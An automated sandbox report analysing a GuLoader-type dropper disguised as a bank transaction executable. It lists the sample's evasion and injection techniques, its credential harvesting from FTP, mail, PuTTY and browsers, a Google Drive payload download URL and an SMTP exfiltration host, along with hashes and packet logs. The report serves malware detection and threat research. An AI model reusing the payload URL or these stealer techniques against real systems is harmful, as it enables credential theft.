            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1Credentials in Registry1Security Software Discovery421Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion341Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion341Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol123Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncSystem Information Discovery115Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 540990 Sample: PKO_TRANS_DETAILS_20211216_... Startdate: 16/12/2021 Architecture: WINDOWS Score: 100 19 smtp.yandex.ru 2->19 21 smtp.yandex.com 2->21 23 3 other IPs or domains 2->23 31 Found malware configuration 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 GuLoader behavior detected 2->35 37 4 other signatures 2->37 8 PKO_TRANS_DETAILS_20211216_0809521.exe 1 2->8         started        signatures3 process4 signatures5 39 Writes to foreign memory regions 8->39 41 Tries to detect Any.run 8->41 43 Hides threads from debuggers 8->43 11 CasPol.exe 19 8->11         started        15 CasPol.exe 8->15         started        process6 dnsIp7 25 smtp.yandex.ru 77.88.21.158, 49847, 49848, 587 YANDEXRU Russian Federation 11->25 27 googlehosted.l.googleusercontent.com 142.250.185.129, 443, 49838 GOOGLEUS United States 11->27 29 drive.google.com 216.58.212.174, 443, 49837 GOOGLEUS United States 11->29 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->45 47 Tries to steal Mail credentials (via file / registry access) 11->47 49 Tries to harvest and steal ftp login credentials 11->49 55 3 other signatures 11->55 17 conhost.exe 11->17         started        51 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->51 53 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->53 signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PKO_TRANS_DETAILS_20211216_0809521.exe21%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ffT40WCIhVVniAbESQ.comt-0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%VirustotalBrowse
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            https://ffT40WCIhVVniAbESQ.com0%Avira URL Cloudsafe
            http://yandex.ocsp-responder.com030%Avira URL Cloudsafe
            http://subca.ocsp-certum.com0.0%Avira URL Cloudsafe
            http://eVxhAq.com0%Avira URL Cloudsafe
            http://subca.ocsp-certum.com010%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            smtp.yandex.ru
            77.88.21.158
            truefalse
              high
              drive.google.com
              216.58.212.174
              truefalse
                high
                googlehosted.l.googleusercontent.com
                142.250.185.129
                truefalse
                  high
                  doc-00-10-docs.googleusercontent.com
                  unknown
                  unknownfalse
                    high
                    smtp.yandex.com
                    unknown
                    unknownfalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://doc-00-10-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1h4vdo343qt36t0eav1jpdhsqf81bcjc/1639657200000/05069790638565246300/*/1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC?e=downloadfalse
                        high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://drive.google.com/~CasPol.exe, 0000000B.00000002.334286203307.0000000000D6B000.00000004.00000020.sdmpfalse
                          high
                          https://ffT40WCIhVVniAbESQ.comt-CasPol.exe, 0000000B.00000002.334300740231.000000001DF13000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://127.0.0.1:HTTP/1.1CasPol.exe, 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://DynDns.comDynDNSCasPol.exe, 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://repository.certum.pl/ctnca.cer09CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.certum.pl/ctnca.crl0kCasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpfalse
                              high
                              http://yandex.crl.certum.pl/ycasha2.crl0qCasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmpfalse
                                high
                                https://ffT40WCIhVVniAbESQ.comCasPol.exe, 0000000B.00000002.334300740231.000000001DF13000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334299831843.000000001DE3A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.330774864610.000000001CC31000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 0000000B.00000002.334299040887.000000001DDB6000.00000004.00000001.sdmpfalse
                                  high
                                  https://www.certum.pl/CPS0CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmpfalse
                                    high
                                    http://smtp.yandex.comCasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmpfalse
                                      high
                                      http://yandex.ocsp-responder.com03CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://subca.ocsp-certum.com0.CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309159021.0000000021397000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305942804.000000001FF5A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://repository.certum.pl/ca.cer09CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309159021.0000000021397000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305942804.000000001FF5A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpfalse
                                        high
                                        http://crls.yandex.net/certum/ycasha2.crl0-CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmpfalse
                                          high
                                          http://eVxhAq.comCasPol.exe, 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://drive.google.com/CasPol.exe, 0000000B.00000002.334286203307.0000000000D6B000.00000004.00000020.sdmpfalse
                                            high
                                            http://subca.ocsp-certum.com01CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://crl.certum.pl/ca.crl0hCasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309159021.0000000021397000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305942804.000000001FF5A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.certum.pl/CPS0CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334309159021.0000000021397000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305942804.000000001FF5A000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334309084502.0000000021390000.00000004.00000001.sdmpfalse
                                                high
                                                https://doc-00-10-docs.googleusercontent.com/CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://repository.certum.pl/ycasha2.cer0CasPol.exe, 0000000B.00000002.334299619985.000000001DE17000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334300195602.000000001DE72000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305830994.000000001FF47000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334305991083.000000001FF5F000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://csp.withgoogle.com/csp/report-to/gse_l9ocaqCasPol.exe, 0000000B.00000003.329839818115.0000000000DF4000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://doc-00-10-docs.googleusercontent.com/2CasPol.exe, 0000000B.00000002.334286477652.0000000000DA7000.00000004.00000020.sdmpfalse
                                                      high
                                                      https://doc-00-10-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/1h4vdo34CasPol.exe, 0000000B.00000003.329840361547.0000000000DF4000.00000004.00000001.sdmpfalse
                                                        high

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        142.250.185.129
                                                        googlehosted.l.googleusercontent.comUnited States
                                                        15169GOOGLEUSfalse
                                                        77.88.21.158
                                                        smtp.yandex.ruRussian Federation
                                                        13238YANDEXRUfalse
                                                        216.58.212.174
                                                        drive.google.comUnited States
                                                        15169GOOGLEUSfalse

                                                        General Information

                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                        Analysis ID:540990
                                                        Start date:16.12.2021
                                                        Start time:13:17:44
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 12m 54s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:PKO_TRANS_DETAILS_20211216_0809521.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                        Run name:Suspected Instruction Hammering
                                                        Number of analysed new started processes analysed:18
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@6/4@3/3
                                                        EGA Information:Failed
                                                        HDC Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 98%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                        • TCP Packets have been reduced to 100
                                                        • Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.54.122.82
                                                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, tile-service.weather.microsoft.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        13:20:46API Interceptor2517x Sleep call for process: CasPol.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        No context

                                                        Domains

                                                        No context

                                                        ASN

                                                        No context

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\~DF96836616C4B0B991.TMP
                                                        Process:C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe
                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                        Category:dropped
                                                        Size (bytes):16384
                                                        Entropy (8bit):2.45010052865662
                                                        Encrypted:false
                                                        SSDEEP:96:jaGu8uY05xb30uxH+iMa9eHC2K4veMC47+crGNa:jtjReMC49rAa
                                                        MD5:9635DCB06D1E14BE1BB3D7D4B4CEA9F0
                                                        SHA1:CCE17243F4FDB2A218D4185E75715E67AE7E219C
                                                        SHA-256:D40FDC94A7E2F1C30434803A370E8881BF493D506000C27178A79CF02ECAB2D6
                                                        SHA-512:D75D3149FFE0F772CE6E99E239E72EADCCB1F2CE55F05ABBF1C687A3991C0DAD6905DA85D0F1CDD8C5FCC91F533E1C0799F04BB2EAC9CD91CB61C480EAA947F3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Roaming\u2trkkyb.crc\Chrome\Default\Cookies
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):3.758760013585961
                                                        Encrypted:false
                                                        SSDEEP:384:qGHsAH0UkOYBOYVOQ0fH8VnRMD+lEofbKWc9JqxYuiAAW2QBRW9TYVVox:pHO9FVISnSSlpDK9SiyBRCcS
                                                        MD5:CFA95D988565672C785871A48B529F85
                                                        SHA1:4D6BED615DFA00E1067E6F95F8EC6C210ADF96A7
                                                        SHA-256:647D64A623FB1B62175441A0EF016F8B4479A64D620498644F15DD04FDFB3B24
                                                        SHA-512:0CB69C41DBE7A482F87FAC27EDADC822928D21B6C238EBED2459CD1873B2181734CB67D3A38714C2BAB57FFAEE699CF5EBFF5ABFC3D291B6C36A8E71572CD402
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview: SQLite format 3......@ ..."..................................................................."..O}.........g.....8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Roaming\u2trkkyb.crc\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000
                                                        Category:modified
                                                        Size (bytes):98304
                                                        Entropy (8bit):0.08231524779339361
                                                        Encrypted:false
                                                        SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                        MD5:886A5F9308577FDF19279AA582D0024D
                                                        SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                        SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                        SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview: SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        \Device\ConDrv
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):30
                                                        Entropy (8bit):3.964735178725505
                                                        Encrypted:false
                                                        SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                        MD5:9F754B47B351EF0FC32527B541420595
                                                        SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                        SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                        SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview: NordVPN directory not found!..

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.690014470947888
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.15%
                                                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:PKO_TRANS_DETAILS_20211216_0809521.exe
                                                        File size:147456
                                                        MD5:1823b507e96d8138bada7c65d424abcc
                                                        SHA1:e5d7884da7d17ba0ae592ff787e84ae665e21c3a
                                                        SHA256:99b81b452d173986229ed512383e05214f35c819aa9da4c2a972bb05c880d536
                                                        SHA512:66c962308ad08bf950dfd738de5585e79aa91a28379fe59ccfd78a578a7e629ff123b63d8509d3f0366089f3cca65e932bee3dee5d8a1744e1f3d8eca340d852
                                                        SSDEEP:3072:U4PvIBPPFoSfth9WGq8Av35lbUTv9/alVVPx:U4PAsGU5+BaxPx
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\.......%.......Rich............................PE..L......U.....................`......$.............@

                                                        File Icon

                                                        Icon Hash:bc546d7f6f130982

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x401524
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:
                                                        Time Stamp:0x55BBDCC8 [Fri Jul 31 20:38:32 2015 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:7d340e80350d9e6231e6392a24967d10

                                                        Entrypoint Preview

                                                        Instruction
                                                        push 00402DA4h
                                                        call 00007F9660DEF3C3h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        xor byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        cmp byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        mov dword ptr [edi+24160C99h], eax
                                                        inc edx
                                                        inc edx
                                                        mov esp, ACC85C27h

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x204f40x28.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x250000x1956.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x1b0.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x1faf00x20000False0.557975769043data6.98717798783IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .data0x210000x36b40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x250000x19560x2000False0.317504882812data4.27344211058IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0x258ae0x10a8data
                                                        RT_ICON0x254460x468GLS_BINARY_LSB_FIRST
                                                        RT_GROUP_ICON0x254240x22data
                                                        RT_VERSION0x251200x304dataEnglishUnited States

                                                        Imports

                                                        DLLImport
                                                        MSVBVM60.DLL__vbaR8FixI4, _CIcos, _adj_fptan, __vbaVarMove, __vbaStrI4, __vbaHresultCheck, __vbaFreeVar, __vbaAryMove, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaLenBstrB, __vbaHresultCheckObj, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaLbound, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaDateVar, _CIlog, __vbaErrorOverflow, __vbaInStr, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, __vbaFPInt, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0409 0x04b0
                                                        LegalCopyrightConcurrency
                                                        InternalNameDagins
                                                        FileVersion2.00
                                                        CompanyNameConcurrency
                                                        LegalTrademarksConcurrency
                                                        CommentsConcurrency
                                                        ProductNameConcurrency
                                                        ProductVersion2.00
                                                        FileDescriptionConcurrency
                                                        OriginalFilenameDagins.exe

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 16, 2021 13:20:35.193742037 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:35.193814993 CET44349837216.58.212.174192.168.11.20
                                                        Dec 16, 2021 13:20:35.194092035 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:35.219216108 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:35.219250917 CET44349837216.58.212.174192.168.11.20
                                                        Dec 16, 2021 13:20:35.273871899 CET44349837216.58.212.174192.168.11.20
                                                        Dec 16, 2021 13:20:35.274013042 CET49837443192.168.11.20216.58.212.174
                                                        Dec 16, 2021 13:20:35.274198055 CET49837443192.168.11.20216.58.212.174
